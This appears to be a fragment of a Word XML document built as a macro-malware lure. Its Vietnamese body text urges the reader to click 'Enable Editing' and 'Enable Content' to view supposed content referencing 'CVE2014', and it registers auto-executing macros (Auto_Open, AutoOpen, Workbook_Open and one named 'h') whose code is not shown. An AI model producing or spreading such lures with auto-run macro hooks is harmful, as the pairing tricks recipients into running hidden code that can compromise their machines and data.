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69" w:rsidRPr="00EE02F9" w:rsidRDefault="00EE02F9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nhấp</w:t>
      </w:r>
      <w:r w:rsidR="0041481E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enable Editting &amp;&amp;</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enable Content  thanh công cụ vàng phía trên để xem nội dung  CVE2014</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00276969" w:rsidRPr="00EE0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4A"/>
    <w:rsid w:val="000207D6"/>
    <w:rsid w:val="001F4C1F"/>
    <w:rsid w:val="00276969"/>
    <w:rsid w:val="0041481E"/>
    <w:rsid w:val="005C3D4A"/>
    <w:rsid w:val="00E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AUTO_OPEN" wne:name="Project.NewMacros.Auto_Open" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.H" wne:name="Project.NewMacros.h" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.WORKBOOK_OPEN" wne:name="Project.NewMacros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İlyasÖzdoğan</dc:creator>
  <cp:lastModifiedBy>NONG DAN</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-18T11:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-03-07T08:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>